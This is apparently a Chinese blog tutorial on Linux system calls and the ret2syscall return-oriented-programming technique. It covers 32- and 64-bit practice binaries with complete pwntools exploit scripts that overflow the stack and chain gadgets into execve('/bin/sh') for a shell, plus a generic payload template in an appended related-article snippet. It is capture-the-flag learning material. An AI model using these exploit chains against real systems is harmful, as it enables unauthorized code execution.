8.6ret2syscall

最新推荐文章于 2025-08-10 14:59:05 发布
原创 最新推荐文章于 2025-08-10 14:59:05 发布 · 672 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #笔记

8.6ret2syscall

一、系统调用

系统调用(syscall)是用户态程序请求操作系统内核服务的接口。他是应用程序与操作系统交互的核心机制,允许程序访问底层硬件、文件系统、进程管理等特权功能。

系统调用的作用:(提供安全访问机制,权限隔离,封装底层细节)

操作系统为保护系统稳定性,将运行换将分为:

用户态:普通程序运行,权限受限
内核态:操作系统核心代码运行,最高权限

流程:

1.用户程序触发系统调用:
通过
32位:int 0x80   --触发系统调用的两种方式
64位: syscall
进入内核态,参数通过寄存器传递
2.内核处理请求
3.返回结果
内核将结果存回寄存器(eax/rax)

二、常见的系统调用示例

Linux系统调用表(system call table)-CSDN博客

系统调用			功能				32位调用号(eax)			64位调用号(rax)
read		读取文件/输入				3						0
write		写入文件/输出				4						1
execve		执行程序(如/bin/sh)		11						59
exit		退出进程					1						60
open		打开文件					5						2

32位与64位区别:

特性			32位(int 0x80)					64位(syscall)
触发指令			int 0x80						syscall
调用号寄存器		eax								rax
参数传递			ebx, ecx, edx, esi, edi			rdi, rsi, rdx, r10, r8, r9
返回值			eax								rax
典型例子			execve("/bin/sh", 0, 0)			execve("/bin/sh", NULL, NULL)

三、ret2syscall

ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。

ROP(面向返回的编程)是一种高级漏洞利用技术,用于绕过内存防护机制(如NX/DEP、栈不可执行),通过复用程序中已有的代码片段(gadgets)构造恶意逻辑,最终实现任意代码执行。

工具:

ROPgadget --binary 文件名 --only 'pop|ret' | grep '寄存器名'
ROPgadget --binary 文件名 --only 'int'
ROPgadget --binary 文件名 --string '/bin/sh'

四、实战

32位:

以rop题为例子:

在这里插入图片描述

一个开启了NX保护的32位静态的ELF可执行文件(静态文件一般比较大,可利用片段多)

在这里插入图片描述

发现栈溢出,静态文件不能利用libc的方法,shift+f12发现/bin/sh位于0x080BE408,利用gets修改main函数的返回值到我们的gadgets,从而进行系统调用,在这里我们执行execve(‘bin/sh’,NULL,NULL)

因为是32位程序,进行系统调用,需要eax寄存器来存储系统调用号,利用其他寄存器放置参数,再次用int 0x80进行触发中断

execve函数,对应值为11,0xb
所以:
eax <- 0xb
execve函数的三个参数分别对应着ebx,ecx,edx三个寄存器
ebx <- /bin/sh
ecx <- 0
edx <- 0
注意:
ecx:参数列表(argv数组),通常以NULL结尾。
edx:环境变量列表(envp数组),通常以NULL结尾
在漏洞利用时,将ecx和edx设为0是最简化的做法

接下来进行寄存器赋值:

汇编语言中有一条指令是pop xxx,可将栈顶数据弹出并存入xxx中,这个xxx可以为寄存器

利用ROPgadget,比如说 pop eax ; ret(从栈顶弹出一个值到 eax,然后返回到下一条指令)

❯ ROPgadget --binary rop --only 'pop|ret' | grep 'eax'
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bb196 : pop eax ; ret
0x0807217a : pop eax ; ret 0x80e
0x0804f704 : pop eax ; ret 3
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
  • ROPgadget --binary rop:分析二进制文件 rop,提取所有可用的 gadgets。
  • --only 'pop|ret'只显示以 pop 开头并以 ret 结尾的 gadgets(即寄存器操作+返回)。
  • | grep 'eax'过滤出包含 eax 寄存器的 gadgets(用于控制 eax,常用于系统调用号设置)。

在这里插入图片描述

在这里插入图片描述

查看偏移量发现是112:

在这里插入图片描述

exp:

from pwn import *

p=process('./rop')

int_addr=0x8049421

bin_sh_addr=0x80be408

pop_edx_ecx_ebx_ret=0x806eb90

pop_eax_ret=0x80bb196

payload=b'a'*112
payload+=p32(pop_eax_ret)+p32(0xb)
payload+=p32(pop_edx_ecx_ebx_ret)+p32(0)+p32(0)+p32(bin_sh_addr)
payload+=p32(int_addr)

p.sendline(payload)
p.interactive()

其他:

03ret2syscall_32

PolarD&N

64位:

ida如图:

在这里插入图片描述

发现溢出,padding = 0x30 + 0x8

gadget这里使用ropper获取,使用pip install ropper安装

在这里插入图片描述

注意: 我们使用read()系统调用后需要send()发送/bin/sh写入到data数据段中,是规定的8个字节

data:初始化的全局变量和静态变量(可读可写,不可执行)
bss:未初始化的全局变量和静态变量(可读可写可执行)

如何获取data数据段的地址呢?
首先使用pwndbg x64_ret2syscall,接着输入b main断点,然后run,最后使用vmmap(用于显示当前进程的内存映射布局)查看

from pwn import *

p = process("./x64_ret2syscall")
p.recvuntil("Welcome to x64_ret2syscall")

buf = 0x6cc000 - 0x40
syscall = 0x0000000000467565
pop_rax_ret = 0x000000000041f5b4

pop_rdi_ret = 0x0000000000401656
pop_rsi_ret = 0x0000000000401777
pop_rdx_ret = 0x0000000000442a46
pop_rdx_rsi_ret = 0x0000000000442a69

padding = 0x30 + 0x8
payload = b"A" * padding 
# read(0,buf,8)
# payload += p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(buf) + p64(pop_rdx_ret) + p64(8)
payload += p64(pop_rdi_ret) + p64(0) + p64(pop_rdx_rsi_ret) + p64(8) + p64(buf)
payload += p64(pop_rax_ret) + p64(0)
payload += p64(syscall)

# execve("/bin/sh",0,0)
# payload += p64(pop_rdi_ret) + p64(buf) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret) + p64(0)
payload += p64(pop_rdi_ret) + p64(buf) + p64(pop_rdx_rsi_ret) + p64(0) + p64(0)
payload += p64(pop_rax_ret) + p64(0x3b)
payload += p64(syscall)


p.send(payload)
p.send("/bin/sh") #/bin/sh 只是作为数据参数传递给系统调用。
p.interactive()
【ARM-Linux开发】Linux模块机制浅析
ZhangPY的专栏
08-28 583
Linux模块机制浅析   Linux允许用户通过插入模块,实现干预内核的目的。一直以来,对linux的模块机制都不够清晰,因此本文对内核模块的加载机制进行简单地分析。 模块的Hello World! 我们通过创建一个简单的模块进行测试。首先是源文件main.c和Makefile。 florian@florian-pc:~/module$ cat main.c #inclu
Kernel trace tools(一):中断和软中断关闭时间过长问题追踪
字节跳动技术团队官方博客
04-20 1万+
本文是由字节跳动系统部 STE 团队出品的 “kernel trace tools” 系列文章,以介绍团队自研多类延迟问题追踪工具。在实际工作中,会遇到由于中断和软中断关闭时间过长而引发...
Radare2:using test
32bin的博客
07-23 727
【代码】Radare2:using test。
第 2 章 进程管理
Oneby的博客
03-05 1421
第 2 章 进程管理 1、 组成、 特征 1.1、思维导图 1.2、进程的概念 程序 & 进程 程序: 是静态的, 就是个存放在磁盘里的可执行文件, 就是一系列的指令集合。 进程(Process) : 是动态的, 是程序的一次执行过程 (同一个程序多次执行会对应多个进程) 思考: 操作系统是这些进程的管理者, 它要怎么区分各个进程? 1.3、进程的组成——PCB PCB 需要记录哪些信息呢? 当进程被创建时, 操作系统会为该进程分配一个唯一的、 不重复的“身份证号” ——PID(Pro
高通平台环境搭建,编译,系统引导流程分析
LoongEmbedded的专栏
06-30 1万+
1、高通平台android开发总结 1.1 搭建高通平台环境开发环境 在高通开发板上烧录文件系统 建立高通平台开发环境 高通平台,android和 modem 编译流程分析 高通平台 7620 启动流程分析 qcril 流程分析,设置sim卡锁 python scons 语法学习 Python 语言之 scons 工具流程分析:   1.
《x86/x64体系探索及编程》图书信息
博文视点(北京)官方博客
11-12 5868
x86/x64体系探索及编程 (对x86处理器介绍得最详尽又最具实践指导意义的一本书) 邓志著 ISBN 978-7-121-18176-4 2012年10月出版 定价:119.00元 16840页 对x86处理器介绍得最详尽又最具实践指导意义的一本书 内 容 简 介 本书是对Intel手册所述处理器架构的探索和论证。全书共五大部分,从多个方面对处理器架构相关的知识进行
linux软中断响应时间,Kernel trace tools(一):中断和软中断关闭时间过长问题追踪...
weixin_33550394的博客
05-01 1434
原标题:Kernel trace tools(一):中断和软中断关闭时间过长问题追踪本文是由字节跳动系统部 STE 团队出品的 “kernel trace tools” 系列文章,以介绍团队自研多类延迟问题追踪工具。在实际工作中,会遇到由于中断和软中断关闭时间过长而引发的高网络延迟问题。但是,对于该类问题的定位和追踪缺乏行之有效的方案或客观依据,需要耗费大量时间和精力用于问题排查,Interrup...
高通平台android开发总结
ahaochina的专栏
06-08 1万+
1、高通平台Android开发总结 1.1 搭建高通平台环境开发环境 在高通开发板上烧录文件系统 建立高通平台开发环境 高通平台,android和 modem 编译流程分析 高通平台 7620 启动流程分析 qcril 流程分析,设置sim卡锁 Python scons 语法学习 Python 语言之 scons 工具流程分析:   1.
Linux教程(第5版)孟庆昌版 课后答案
热门推荐
weixin_42023723的博客
06-15 3万+
最近在复习Linux,用的教材是《Linux教程(第5版)孟庆昌版》,但每章的课后复习题答案没给,不太方便,我整理了一下
x86 x64体系探索及编程 part2
04-18
34 2.5 编程基础 34 2.5.1 操作数寻址 35 2.5.2 传送数据指令 39 2.5.3 位操作指令 45 2.5.4 算术指令 47 2.5.5 CALL 与RET 指令 48 2.5.6 跳转指令 48 2.6 编辑与编译、运行 48 第 3 章编写本书的实验例子 50 3.1 ...
x86 x64体系探索及编程part4
04-18
34 2.5 编程基础 34 2.5.1 操作数寻址 35 2.5.2 传送数据指令 39 2.5.3 位操作指令 45 2.5.4 算术指令 47 2.5.5 CALL 与RET 指令 48 2.5.6 跳转指令 48 2.6 编辑与编译、运行 48 第 3 章编写本书的实验例子 50 3.1 ...
x86 x64体系探索及编程part1
04-18
34 2.5 编程基础 34 2.5.1 操作数寻址 35 2.5.2 传送数据指令 39 2.5.3 位操作指令 45 2.5.4 算术指令 47 2.5.5 CALL 与RET 指令 48 2.5.6 跳转指令 48 2.6 编辑与编译、运行 48 第 3 章编写本书的实验例子 50 3.1 ...
anaconda 镜像源清华源问题解决
qq_19716091的博客
08-08 403
文件位置‪ C:\Users\用户\.condarc。用清华源时出现的如下图的问题。可以更换为中科大的镜像源。.condarc内容。
WebSocket 在多线程环境下处理 Session并发
TOOZOOY的博客
08-07 1106
WebSocket 在多线程环境下处理 Session并发时,常见问题包括状态冲突(如 IllegalStateException)、消息乱序、连接超时等。以下是综合各技术方案的解决方案,分为单机多线程和分布式集群两类场景:
Python 属性描述符(方法是描述符)
钢铁男儿
08-08 521
❶ Text 实例的 repr 方法返回一个类似 Text 构造方法调用的字符串,❸ 如果为 obj.spam 赋值,会遮盖类属性,导致无法通过 obj 实例访。在类中定义的函数属于绑定方法(bound method),因为用户定义的函。下面来分析 Text.reverse 方法,如示例 20-15 所示。❹ 注意类型是不同的,一个是 function,一个是 method。象,里面包装着函数,并把托管实例(例如 obj)绑定给函数的第一个。方法,因此是非覆盖型描述符,如示例 20-13 中。
tkwebview-tkinter的web视图
tinga_kilin的博客
08-06 1054
tkinter的web视图
深入 FastMCP 源码:认识 tool()、resource() 和 prompt() 装饰器
Hoper-J的博客
08-09 579
在使用 FastMCP 开发 MCP 服务器时经常会用到 `@mcp.tool()` 等装饰器。虽然它们用起来很简单,但当作黑匣子总让人感觉"不得劲"。接下来我们将深入相关的源码实现,别担心,不会钻没有意义的“[兔子洞](https://en.wikipedia.org/wiki/Wiki_rabbit_hole)”,你可以通过这篇文章了解到: - 如何简单启动本地的 MCP Server 和 MCP Inspector - 这些装饰器具体做了什么 - @mcp.tool() - @mcp.res
Numpy科学计算与数据分析:Numpy布尔索引与花式索引实战
WSSWWWSSW的博客
08-08 900
本课程介绍Numpy中的两种高级索引技术:布尔索引和花式索引。布尔索引通过条件表达式筛选数组元素,支持多条件组合,适用于数据清洗和筛选场景。花式索引使用整数数组选择特定元素,可应用于多维数组,灵活选择不连续的数据点。这两种索引技术在数据科学中应用广泛,包括数据清洗、分析和机器学习等领域,能有效提高数据处理效率和代码可读性。课程通过具体示例演示了如何在实际项目中应用这些高级索引方法。
Python设计模式 - 装饰模式
最新发布
mofei
08-10 82
装饰模式是一种动态扩展对象功能的结构型设计模式,通过组合而非继承的方式实现功能扩展。它包含抽象组件、具体组件、装饰器和具体装饰器四个角色,适用于不修改原类代码或替代复杂继承结构的场景。该模式优点包括灵活性高、可复用性强、支持功能叠加,但也可能增加系统复杂性、影响性能和调试难度。代码示例展示了如何通过装饰器为文本动态添加加粗、斜体等下划线样式,体现了装饰模式的运行机制。该模式在需要动态扩展功能时提供了优雅的解决方案。
ret2syscall64位
03-26
<think>好的,我需要帮助用户理解ret2syscall64位系统上的实现原理和使用方法。首先,我需要回顾一下ret2syscall的基本概念。根据引用[1],ret2syscall是一种利用二进制漏洞的技巧,通过控制程序执行流来触发系统调用,从而获取系统控制权。接下来,我需要比较32位和64位系统的不同之处,特别是系统调用的机制。 根据引用[4],64位系统使用syscall指令而不是int 80h,并且系统调用号存放在rax寄存器,参数则通过rdi、rsi、rdx等传递。例如,execve的系统调用号在64位是0x3b。这提示在构造ROP链时,需要正确设置这些寄存器的值,然后跳转到syscall指令的地址。 然后,我需要考虑漏洞利用的具体步骤。通常,攻击者需要覆盖返回地址,控制程序执行流程,利用现有的gadgets来设置寄存器,最后执行syscall。引用[2]和[3]提到,syscall指令用于触发系统调用,而execve常用于获取shell。因此,构造ROP链时,需要找到设置rax=0x3b、rdi指向"/bin/sh"、rsi和rdx为0的gadgets,并确保栈布局正确。 还需要注意64位和32位的区别,比如参数寄存器的不同,以及系统调用号的差异。引用[4]详细说明了这些不同点,需要确保用户清楚这些细节。此外,可能需要处理地址随机化(ASLR)和栈保护机制,比如通过信息泄露来获取地址,或者寻找不依赖地址的gadgets。 最后,我应该总结实现步骤,并给出示例的利用代码结构,帮助用户更好地理解。同时,要提醒用户在实际操作中需要注意的问题,比如对齐和参数顺序。这样,用户就能系统地掌握ret2syscall64位系统中的实现方法和利用技巧。</think>### ret2syscall64位系统上的实现原理与使用方法 #### 一、实现原理 ret2syscall 是一种通过**控制程序执行流**,构造特定寄存器状态并触发系统调用的漏洞利用技术。在64位系统中,系统调用通过 `syscall` 指令实现(而非32位的 `int 80h`),系统调用号存放在 `rax` 寄存器,参数依次通过 `rdi`、`rsi`、`rdx`、`r10`、`r8`、`r9` 传递[^4]。例如,`execve("/bin/sh",0,0)` 的系统调用号为 `0x3b`[^3]。 #### 二、利用步骤 1. **覆盖返回地址**:通过栈溢出或堆漏洞覆盖返回地址,劫持程序执行流。 2. **构造寄存器状态**: - 利用 ROP(Return-Oriented Programming)链设置 `rax=0x3b`(execve 的系统调用号) - `rdi` 指向字符串 `/bin/sh` 的地址 - `rsi=0`(参数数组指针)、`rdx=0`(环境变量指针) 3. **触发系统调用**:跳转到 `syscall` 指令地址执行。 #### 三、关键代码示例 ```python # 假设已获取以下 gadget 地址: # pop_rax_ret, pop_rdi_ret, pop_rsi_ret, pop_rdx_ret, syscall_addr, binsh_addr payload = b'A' * offset # 填充缓冲区 payload += p64(pop_rax_ret) # 设置 rax=0x3b payload += p64(0x3b) payload += p64(pop_rdi_ret) # 设置 rdi=binsh_addr payload += p64(binsh_addr) payload += p64(pop_rsi_ret) # 设置 rsi=0 payload += p64(0) payload += p64(pop_rdx_ret) # 设置 rdx=0 payload += p64(0) payload += p64(syscall_addr) # 执行 syscall ``` #### 四、注意事项 1. **寄存器顺序**:必须按 `rdi, rsi, rdx, r10...` 顺序传递参数。 2. **地址对齐**:部分架构要求栈对齐(如16字节对齐)。 3. **防御绕过**:需绕过 ASLR(地址随机化)和 NX(不可执行栈)防护,常用方法包括: - 通过信息泄露获取地址 - 使用 PLT/GOT 表中的固定地址 #### 五、典型应用场景 - 获取系统 shell(`execve("/bin/sh",0,0)`) - 文件读写(如 `open/read/write` 系统调用链) - 权限提升(配合 SUID 程序)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

by polar

我知道你很帅

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值